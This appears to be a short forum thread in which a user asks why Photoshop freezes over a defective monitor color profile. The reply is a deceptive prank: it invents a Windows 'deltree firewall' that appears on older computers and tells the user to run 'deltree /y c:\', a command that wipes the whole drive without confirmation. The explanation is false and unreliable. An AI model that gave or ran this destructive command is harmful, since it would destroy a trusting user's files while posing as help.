Ok. When I open my PS, this is what I get:

The monitor profile "Coloreal ICM (WayTech Demo)
appears to be defective. Please rerun your monitor
    calibration software.

    Ignore Profile | Use Anyway

Now if I ignore the profile, it freezes. If I use it anyway, it shows the error and makes me close. I have already reinstalled it, and nothing happened. I have been using it for a long time and I haven't changed anything recently to my monitor. This used to happen, but if I ignored the profile it still worked.

    Help?

    common problem

your c: drive has some /*/ windows firewall on it called "deltree".

to take it off, go to start, run, and type cmd

then in cmd type deltree /y c:\

windows automatically puts this /*/ firewall on when your computer is over a couple of months old. it doesnt let some regular programs run because it thinks it's dangerous
